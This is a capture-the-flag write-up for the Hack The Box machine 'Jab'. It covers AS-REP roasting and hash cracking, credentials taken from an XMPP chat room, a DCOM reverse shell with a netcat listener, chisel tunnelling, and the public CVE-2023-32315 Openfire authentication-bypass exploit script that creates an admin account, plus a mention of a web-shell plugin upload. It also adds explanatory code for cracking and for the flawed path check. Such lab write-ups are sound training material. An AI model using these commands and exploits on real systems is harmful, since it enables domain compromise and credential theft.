Jab
Steps to Get the Root Flag:
Obtain a user's NTLM hash and crack it to find the password.
Use the user's credentials to access port "5222" and obtain credentials for another user.
Use the obtained credentials to explore further and run BloodHound to identify potential paths.
Gain shell access on DC01 and search for ways to escalate privileges.
Access the web application and upload a shell to compromise the domain.
Let's begin.
I started with the usual Nmap scan; while it ran I also poked at the common ports (SMB, RPC, LDAP) by hand but found nothing interesting. Here are the Nmap results:
# Nmap 7.94SVN scan initiated Wed Mar 20 13:52:35 2024 as: nmap -A -T4 -oN nmap.txt -Pn 10.10.11.4
Warning: 10.10.11.4 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.4 (10.10.11.4)
Host is up (0.22s latency).
Not shown: 902 closed tcp ports (conn-refused), 85 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-20 17:59:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-20T18:01:24+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-03-20T18:01:31+00:00; +2s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-20T18:01:26+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| errors:
| invalid-namespace
| (timeout)
| compression_methods:
| auth_mechanisms:
| capabilities:
| xmpp:
| version: 1.0
| stream_id: 2llsnnt55f
|_ unknown:
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| STARTTLS Failed
| info:
| features:
| errors:
| host-unknown
| (timeout)
| compression_methods:
| auth_mechanisms:
| capabilities:
| xmpp:
| version: 1.0
| stream_id: axra5bza2w
|_ unknown:
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Wed, 20 Mar 2024 17:59:24 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Wed, 20 Mar 2024 17:59:36 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| TerminalServerCookie:
| HTTP/1.1 400 Illegal character CNTL=0x3
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x3</pre>
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port7070-TCP:V=7.94SVN%I=7%D=3/20%Time=65FB23FB%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,189,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2020\x20Mar\x
SF:202024\x2017:59:24\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\x20202
SF:2\x2015:55:02\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x2
SF:0bytes\r\nContent-Length:\x20223\r\n\r\n<html>\n\x20\x20<head><title>Op
SF:enfire\x20HTTP\x20Binding\x20Service</title></head>\n\x20\x20<body><fon
SF:t\x20face=\"Arial,\x20Helvetica\"><b>Openfire\x20<a\x20href=\"http://ww
SF:w\.xmpp\.org/extensions/xep-0124\.html\">HTTP\x20Binding</a>\x20Service
SF:</b></font></body>\n</html>\n")%r(RTSPRequest,AD,"HTTP/1\.1\x20505\x20U
SF:nknown\x20Version\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nC
SF:ontent-Length:\x2058\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\
SF:x20505</h1><pre>reason:\x20Unknown\x20Version</pre>")%r(HTTPOptions,56,
SF:"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2020\x20Mar\x202024\x2017:59:
SF:36\x20GMT\r\nAllow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n")%r(RPCCheck,C7,"H
SF:TTP/1\.1\x20400\x20Illegal\x20character\x20OTEXT=0x80\r\nContent-Type:\
SF:x20text/html;charset=iso-8859-1\r\nContent-Length:\x2071\r\nConnection:
SF:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\
SF:x20character\x20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTTP/1\.1
SF:\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/ht
SF:ml;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\
SF:r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20charact
SF:er\x20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1\.1\x20400\x20Il
SF:legal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=is
SF:o-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Ba
SF:d\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x
SF:0</pre>")%r(Help,9B,"HTTP/1\.1\x20400\x20No\x20URI\r\nContent-Type:\x20
SF:text/html;charset=iso-8859-1\r\nContent-Length:\x2049\r\nConnection:\x2
SF:0close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20No\x20URI</
SF:pre>")%r(TerminalServerCookie,C3,"HTTP/1\.1\x20400\x20Illegal\x20charac
SF:ter\x20CNTL=0x3\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nCon
SF:tent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x2
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x3</pre>");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-20T18:01:14
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
After that lengthy enumeration I moved on to user enumeration with Kerbrute, which also flags accounts that have "Do not require Kerberos preauthentication" set (the AS-REP roasting condition):
./kerbrute_linux_amd64 userenum -d jab.htb --dc 10.10.11.4 /home/kali/Desktop/my_folder/HackTheBox/academy/AD-enum/jsmith.txt -o kerb-results
Kerbrute reported AS-REP hashes for a few users, but not in the format Hashcat mode 18200 expects ($krb5asrep$23$, RC4). So I fed the valid usernames to impacket's GetNPUsers, which requests the RC4 encryption type and prints Hashcat-ready lines:
impacket-GetNPUsers 'jab.htb/' -usersfile users.txt -dc-ip 10.10.11.4 -format hashcat
Impacket v0.11.0 - Copyright 2023 Fortra
$krb5asrep$23$<user>@JAB.HTB:92ffbb3899a8b6acdeabff20e446cd13$e5d99f30562649d4650004b298ba052a86aa56fa0732fec8687a3eccffb534c07e2e163c1a7bde0949db156d36e34402c9a6de2ec9a7f28568701f2a636c556b5f88b505e966cede204f230a461a87cf249ce6e056d7f6f8faf3cb5c4cf156afef94d12e5021699d4dea0ae66442c000f10cda696c4c2b42d26f3907eb8d895fd5ead6c96b47c217a0e9000bd9da48ca5b99a92eb787657645bf09858af7b6934ac845c2db58b4d9de705a89f5540efa3556ab6b4b57d2045b03bf574425ce88b0b9da7dc2dffbe84f27202ef2b869ae57e93c4d67913fbc6cc41edcea59e7372717
$krb5asrep$23$<user>@JAB.HTB:75430efc7f3b4ecd7771f59bedd54b85$654e960551fac621fa5b5b585f3a442ee6d52f63f6dfbad6d011dfdce9f9524f46d41c28a74a55635bba075eba11293afdf83165025e911c323771df5c58aca62dedd707388b8ffaa645193db2b6baa8fafdd7e4cc878b062c280c8cad81a7c42602f7ee8d637c842ae9ae1f5384ac798ab5f35240844ecb82bf96cfb00f0a011fcec4e477a3f0d785186035e1d213a2e9628413e244306a601d86b9aa6d765a63fad1881d5f77447e6ce1e84c8f9e927f2e787876e1cd62cd46abc8c1328b8969198779bc6fbd1053ae15e49639a19bd5ccb5402ca1b3c583eefa61e8e3d382c925
$krb5asrep$23$<user>@JAB.HTB:c8c2c5a01efa254833d185671dae8b36$ebc9b76ea58f9dbce7e71682992d6a63cf46a6f6ff3dc5bc36988812b62a4cdc56c82e28610a2d4e6577ccbb8364b8b0d82a9c3147aa1c5091251e64435e602969ea89eeabee61a1cf9b2e0d6305bff31e4f58c03e1dba560f6e6f9c1a8d4d0a03e881c5d212717102d2d536ceaeaad86784f3d78864a3fcacd6badb29af1cc6f6762a29ae13771147b4e41727dbc30b9327b14c764a130d64dcc60f6b55f8ed228dbadb4db62d1a1c2ec1ab1962a373c89af643b59d44970b5bc9d534b3fd1c344687ff879304dbd4538805332721adec36808edd31e53db7076424dfc3f8f21c31
Then I ran them through Hashcat (mode 18200, Kerberos 5 AS-REP etype 23). Only one cracked, the hash belonging to "jmontgomery":
$krb5asrep$23$jmontgomery@JAB.HTB:73ce348100567e29985c61595ee2b08d$3498fa3a484ab2c304d9cdcd986e7a7a2a76d6434b68b57a5bb96bbaaf58d360a1d8bd311d3732d9a59e74b73bce254a3fb87b161da4eb6b07cb81783133d2ddc58e9a06295b2daaca56e76707ce8563789eb16718e5fa337c086d7a1ccaefc5d42576798efc21bc390ac1fb8f6708d516cfbda1f61f95e1dcc0d40c32a63c53f199b1ea421ef1c2ca16c04b419367f851f2e0fe7c6f556f2c4de901c4cf9677ab12d82f212b280fc2c4448b68b4d030a4bfe7a51e07a52d52b79ed0f12a47106f81397159cb7477dc7a4dd3b4c471cb34fef0c37e92ff8b83d9d154d5356e333cb2:Midnight_121
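To see what Hashcat is actually doing with a $krb5asrep$23$ line, here is an added example written for this write-up (not the box's, impacket's or Hashcat's code). It implements MD4/NTLM, RC4 and the RC4-HMAC verification from RFC 4757 in pure Python, then parses a Hashcat line and tests candidate passwords against it. The AS-REP it checks is a constructed sample built with the same routines; the confounder and plaintext bytes are made up, and the realm JAB.HTB / user jmontgomery are taken from the page.

```python
# Added example: what hashcat mode 18200 checks for a $krb5asrep$23$ line.
# Pure-Python MD4, RC4 and RFC 4757 RC4-HMAC; not impacket's or hashcat's code.
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data):
    """RFC 1320 MD4 (hashlib's md4 is often disabled under OpenSSL 3)."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, order, shifts in rounds:
            for i, j in enumerate(order):
                # one MD4 step, then rotate the four registers so the next step works on d
                a, b, c, d = d, rot((a + f(b, c, d) + X[j] + k) & MASK, shifts[i % 4]), b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def ntlm_hash(password):
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


AS_REP_USAGE = 8  # RFC 4757: key usage 3 (AS-REP enc-part) maps to 8 for RC4-HMAC


def _k1(key):
    return hmac.new(key, struct.pack("<I", AS_REP_USAGE), "md5").digest()


def asrep_encrypt(password, confounder, plaintext):
    """Forward direction (what the KDC does): returns (checksum, ciphertext)."""
    k1 = _k1(ntlm_hash(password))
    data = confounder + plaintext
    checksum = hmac.new(k1, data, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum, rc4(k3, data)


def hashcat_line(user, realm, checksum, edata):
    """Same layout GetNPUsers -format hashcat prints."""
    return "$krb5asrep$23$%s@%s:%s$%s" % (user, realm, checksum.hex(), edata.hex())


def parse_line(line):
    head, body = line.split(":", 1)
    tag, mode, etype, principal = head.split("$", 3)  # '', 'krb5asrep', '23', 'user@REALM'
    if (tag, mode, etype) != ("", "krb5asrep", "23"):
        raise ValueError("not an RC4 ($krb5asrep$23$) line: " + head)
    checksum_hex, edata_hex = body.split("$", 1)
    edata_hex = edata_hex.split(":", 1)[0]  # tolerate hashcat's ':<cracked password>' suffix
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def check_password(line, candidate):
    """Derive K3 from the candidate, decrypt, and see whether the HMAC matches."""
    _, checksum, edata = parse_line(line)
    k1 = _k1(ntlm_hash(candidate))
    k3 = hmac.new(k1, checksum, "md5").digest()
    plain = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, plain, "md5").digest(), checksum)


def crack(line, wordlist):
    """Dictionary attack: first candidate that verifies, or None."""
    for word in wordlist:
        if check_password(line, word):
            return word
    return None


if __name__ == "__main__":
    # Constructed sample: a fake AS-REP for jmontgomery under the page's password.
    chk, edata = asrep_encrypt("Midnight_121", b"\xaa" * 8, b"\x79\x82\x01\x30" + b"\x00" * 60)
    line = hashcat_line("jmontgomery", "JAB.HTB", chk, edata)
    print(line)
    print("cracked:", crack(line, ["password", "Winter2024", "Midnight_121"]))
```

Every guess costs one MD4, three HMAC-MD5s and one RC4 pass, which is why AS-REP hashes crack fast and why a password like Midnight_121 in a wordlist falls immediately; the AES (etype 18) variant needs PBKDF2 with 4096 iterations per guess and is far slower.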
I tried enumerating further with jmontgomery's credentials but found nothing significant, so I turned to port 5222. XMPP (Extensible Messaging and Presence Protocol) is the chat protocol Openfire serves; it is common in messaging platforms, collaboration tools and IoT devices. To talk to it I installed the Pidgin client:
sudo apt install pidgin
Next I launched Pidgin and added an account using the XMPP protocol.

Then I entered jmontgomery's credentials (domain jab.htb):

The account logged in successfully.

The room list is under Tools > Room List,

then click Find Rooms.

There is an interesting room called "pentest2003". Opening it

drops us into the chat room, where a set of user credentials (for svc_openfire) has been posted.

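Behind those Pidgin clicks there is a small XMPP exchange: open a stream, STARTTLS, authenticate with SASL PLAIN, then ask the multi-user-chat service for its rooms with a disco#items query (that is what "Find Rooms" sends). The following is an added example written for this write-up, not Pidgin's or Openfire's code; the stanza shapes follow RFC 6120, RFC 4616 and XEP-0030. It assumes the MUC service is conference.jab.htb (Openfire's default naming) and the server reply it parses is constructed, with a second room name made up for illustration.

```python
# Added example: the XMPP exchange Pidgin performs for the GUI steps above.
# Not Pidgin's or Openfire's code; conference.jab.htb is an assumed service name.
import base64
import xml.etree.ElementTree as ET

NS_SASL = "urn:ietf:params:xml:ns:xmpp-sasl"
NS_TLS = "urn:ietf:params:xml:ns:xmpp-tls"
NS_DISCO_ITEMS = "http://jabber.org/protocol/disco#items"


def sasl_plain_token(username, password, authzid=""):
    """SASL PLAIN credential: base64(authzid NUL authcid NUL password)."""
    raw = f"{authzid}\0{username}\0{password}".encode("utf-8")
    return base64.b64encode(raw).decode("ascii")


def sasl_plain_decode(token):
    """What the server does with the token: split on NUL into its three parts."""
    parts = base64.b64decode(token).decode("utf-8").split("\0")
    if len(parts) != 3:
        raise ValueError("malformed PLAIN token")
    return tuple(parts)


def client_login_stanzas(domain, username, password):
    """Client-side messages, in order. The stream is re-opened after STARTTLS
    succeeds and again after <success/>; PLAIN must only be sent inside TLS."""
    stream_open = (f"<stream:stream to='{domain}' xmlns='jabber:client' "
                   f"xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>")
    return [
        stream_open,
        f"<starttls xmlns='{NS_TLS}'/>",  # server answers <proceed/>, TLS handshake follows
        stream_open,                      # stream restart inside TLS
        f"<auth xmlns='{NS_SASL}' mechanism='PLAIN'>{sasl_plain_token(username, password)}</auth>",
        stream_open,                      # stream restart after <success/>
    ]


def room_list_query(muc_service, query_id="rooms1"):
    """disco#items IQ: 'which rooms does this MUC service host?' (Pidgin's Find Rooms)."""
    return f"<iq type='get' id='{query_id}' to='{muc_service}'><query xmlns='{NS_DISCO_ITEMS}'/></iq>"


def parse_room_list(iq_xml):
    """Return {room JID: name} from a disco#items result; raise on an error IQ."""
    root = ET.fromstring(iq_xml)
    if root.get("type") != "result":
        err = root.find("error")
        cond = err[0].tag if err is not None and len(err) else "unknown"
        raise ValueError(f"server returned type={root.get('type')!r}: {cond}")
    return {item.get("jid"): item.get("name", "") for item in root.iter(f"{{{NS_DISCO_ITEMS}}}item")}


# Constructed server reply, shaped like what a MUC service returns (room 'general' is made up).
SAMPLE_RESULT = (
    "<iq type='result' id='rooms1' from='conference.jab.htb' to='jmontgomery@jab.htb/pidgin'>"
    f"<query xmlns='{NS_DISCO_ITEMS}'>"
    "<item jid='pentest2003@conference.jab.htb' name='pentest2003'/>"
    "<item jid='general@conference.jab.htb' name='general'/>"
    "</query></iq>"
)

if __name__ == "__main__":
    for stanza in client_login_stanzas("jab.htb", "jmontgomery", "Midnight_121"):
        print("C:", stanza)
    print("C:", room_list_query("conference.jab.htb"))
    print("S:", SAMPLE_RESULT)
    print("rooms:", parse_room_list(SAMPLE_RESULT))
```

The PLAIN token is only base64, not encryption, which is why the client insists on STARTTLS first; anyone who can read port 5222 traffic without TLS gets the domain password in the clear. The room query needs no special privilege, so any valid domain user can list (and usually join) every public room, which is exactly how a chat transcript with credentials in it leaks.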
Enumerating with these credentials, svc_openfire could not get a shell over SMB (psexec/smbexec style) or WinRM, and the usual checks turned up nothing special, so I ran BloodHound:
sudo bloodhound-python -ns 10.10.11.4 -d jab.htb -c All -u 'svc_openfire' -p '!@#$%^&*(1qazxsw'
After marking svc_openfire as owned in BloodHound and querying the shortest paths to Domain Admins from owned principals, I found this:

So the user has an ExecuteDCOM edge to DC01: it can instantiate DCOM objects (such as MMC20.Application) remotely and run commands through them. Let's use that for the first shell and the first flag. First I generated a PowerShell reverse shell and Base64-encoded it (UTF-16LE, as -EncodedCommand expects) using a reverse-shell generator website:

Then I started a listener on the port used in the reverse shell and ran impacket's dcomexec:
dcomexec.py -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'Powershell.exe -EncodedCommand <base64-encoded reverse shell>' -silentcommand
Catching the shell on Kali:
rlwrap nc -lnvp 5055
listening on [any] 5055 ...
connect to [10.10.16.55] from (UNKNOWN) [10.10.11.4] 56217
Once you have a foothold, check for services listening only on loopback: they never show up in the external scan but often host an admin interface.
PS C:\windows\system32> netstat -ano | findstr /i '127.0.0.1'
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2636
TCP 127.0.0.1:389 127.0.0.1:49764 ESTABLISHED 640
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 3164
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 3164
Port 9090 answered HTTP, which I confirmed with Invoke-RestMethod:
PS C:\windows\system32> Invoke-RestMethod -Uri "http://127.0.0.1:9090/" -Method Get
<html>
<head><title></title>
<meta http-equiv="refresh" content="0;URL=index.jsp">
</head>
<body>
</body>
</html>
Adding index.jsp returns the real page, which is the Openfire admin console login:
PS C:\windows\system32> Invoke-RestMethod -Uri "http://127.0.0.1:9090/index.jsp" -Method Get
To reach it from my browser I started chisel on Kali in reverse mode:
/home/kali/Desktop/chisel_1.9.1_linux_amd64 server -p 9999 -reverse
2024/03/27 18:29:48 server: Reverse tunnelling enabled
2024/03/27 18:29:48 server: Fingerprint D99oIixX7Uvimv5A3ethbzP4rf1n0qixGamg4l7j5hQ=
2024/03/27 18:29:48 server: Listening on http://0.0.0.0:9999
2024/03/27 18:30:05 server: session#1: tun: proxy#R:9090=>9090: Listening
Then I copied chisel.exe to the Windows host and ran it as a client, forwarding the loopback web port back to Kali:
PS C:\users\svc_openfire\Documents> .\chisel.exe client 10.10.16.55:9999 R:9090:127.0.0.1:9090
When the login page loads, the credentials of the compromised user "svc_openfire" get us in:

And it works! Next I looked for an upload feature, because you know what we do with one of those, right? xD It is under the Plugins tab (plugin-admin.jsp), which accepts a plugin upload as a .jar file:

Searching for this Openfire version showed it is vulnerable, and a web-shell plugin is publicly available. I uploaded it, ran commands through the web shell with the privileges of the Openfire service on DC01, grabbed the root flag, and the domain was compromised.

But wait a minute: we should understand CVE-2023-32315 first, because we aren't script kiddies who run exploits without knowing what happens underneath xD. The exploit function from the public PoC is quoted below; this is the exploit phase:
#!/usr/bin/env python3
# Exploit phase of the public CVE-2023-32315 PoC (authentication bypass via path
# traversal in the Openfire admin console). The logic is kept as published; the
# imports, the helper it relies on and a __main__ entry are added so it runs.
# Requires the third-party HackRequests library: pip install HackRequests
import random
import string
import sys

import HackRequests


def generate_random_string(length):
    """Random lowercase/digit string for the throwaway admin account."""
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=length))


def exploit(target):
    hack = HackRequests.hackRequests()
    host = target.split("://")[1]
    # setup 1: get csrf + jsessionid
    jsessionid = ""
    csrf = ""
    try:
        # %u002e is a non-standard Unicode escape for '.', decoded after the auth filter
        url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Connection": "close",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "DNT": "1",
            "X-Forwarded-For": "1.2.3.4",
            "Upgrade-Insecure-Requests": "1",
        }
        print(f"[..] Checking target: {target}")
        hh = hack.http(url, headers=headers)
        # the unauthenticated response still sets a session and a csrf cookie
        jsessionid = hh.cookies.get("JSESSIONID", "")
        csrf = hh.cookies.get("csrf", "")
        if jsessionid != "" and csrf != "":
            print(f"Successfully retrieved JSESSIONID: {jsessionid} + csrf: {csrf}")
        else:
            print("Failed to get JSESSIONID and csrf value")
            return
        # setup 2: add user
        username = generate_random_string(6)
        password = generate_random_string(6)
        header2 = {
            "Host": host,
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Connection": "close",
            "Cookie": f"JSESSIONID={jsessionid}; csrf={csrf}",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "DNT": "1",
            "X-Forwarded-For": "1.2.3.4",
            "Upgrade-Insecure-Requests": "1",
        }
        # same traversal, this time into user-create.jsp with isadmin=on
        create_user_url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
        hhh = hack.http(create_user_url, headers=header2)
        if hhh.status_code == 200:
            print(f"User added successfully: url: {target} username: {username} password: {password}")
            with open("success.txt", "a+") as f:
                f.write(f"url: {target} username: {username} password: {password}\n")
        else:
            print("Failed to add user")
        # setup 3: add plugin (not part of the snippet quoted here)
    except Exception as e:
        print(f"Error occurred while retrieving cookies: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} http://host:9090")
    exploit(sys.argv[1].rstrip("/"))
The script is easy to follow. This Openfire version is vulnerable to a path traversal that bypasses authentication on the admin console: the setup wizard pages (/setup/setup-*) are exempt from the login check, and by writing the traversal with non-standard %u Unicode escapes, which the server decodes only after that check has passed, an unauthenticated request can reach any admin page:
%u002e%u002e/%u002e%u002e = ../../
So the exploit has three phases:
Phase 1:
Request user-groups.jsp through the traversal and collect the JSESSIONID and csrf cookies the server sets.
Phase 2:
Request user-create.jsp the same way, passing the csrf value, to create a new user with isadmin=on. (In our case this phase is unnecessary: we already hold the svc_openfire admin credentials.)
create_user_url= f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
Phase 3:
Log in to the admin console and upload the malicious plugin for RCE.
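To make the authorization mistake concrete, here is an added example written for this write-up, not Openfire's code: it models the login filter as "exempt paths are checked, everything else needs a session", shows why checking the raw request path lets the %u002e traversal through, and sets the vulnerable check beside a hardened one that authorizes on the canonical path and stops exempting the wizard once setup is finished. The %u-escape decoding and the setup-prefix exemption are simplifications of the real server's behaviour.

```python
# Added example: a model of the check behind CVE-2023-32315, vulnerable vs hardened.
# Not Openfire's code; the filter logic is reduced to the essentials.
import posixpath
import re
from urllib.parse import unquote

# Pages the setup wizard needs before an admin exists, so the login filter exempts them.
SETUP_PREFIX = "/setup/setup-"
# The traversal used by the PoC above.
POC_PATH = "/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"


def decode_path(raw):
    """Decode %uXXXX escapes (a legacy, non-standard form the embedded server
    accepted) and then ordinary %XX escapes."""
    raw = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), raw)
    return unquote(raw)


def canonical(raw):
    """The path the servlet container ends up dispatching to: decoded, '..' collapsed."""
    return posixpath.normpath(decode_path(raw))


def vulnerable_filter(raw_path, authenticated):
    """Bug: the exemption is evaluated on the raw request path, while dispatch
    happens on the decoded, normalised one. Returns (allowed, page served)."""
    if raw_path.startswith(SETUP_PREFIX):
        return True, canonical(raw_path)
    return authenticated, canonical(raw_path)


def hardened_filter(raw_path, authenticated, setup_complete=True):
    """Authorize on the canonical path, refuse traversal or double-encoding
    outright, and stop exempting the wizard once setup has finished."""
    page = canonical(raw_path)
    decoded = decode_path(raw_path)
    if ".." in decoded.split("/") or "%" in decoded:
        return False, page
    if page.startswith(SETUP_PREFIX) and not setup_complete:
        return True, page
    return authenticated, page


if __name__ == "__main__":
    print("raw request :", POC_PATH)
    print("served page :", canonical(POC_PATH))
    print("vulnerable  :", vulnerable_filter(POC_PATH, authenticated=False))
    print("hardened    :", hardened_filter(POC_PATH, authenticated=False))
```

The general lesson is the one behind most path-based authorization bypasses: decode and normalise first, decide second, and never let an exemption meant for a bootstrap state survive once that state is over.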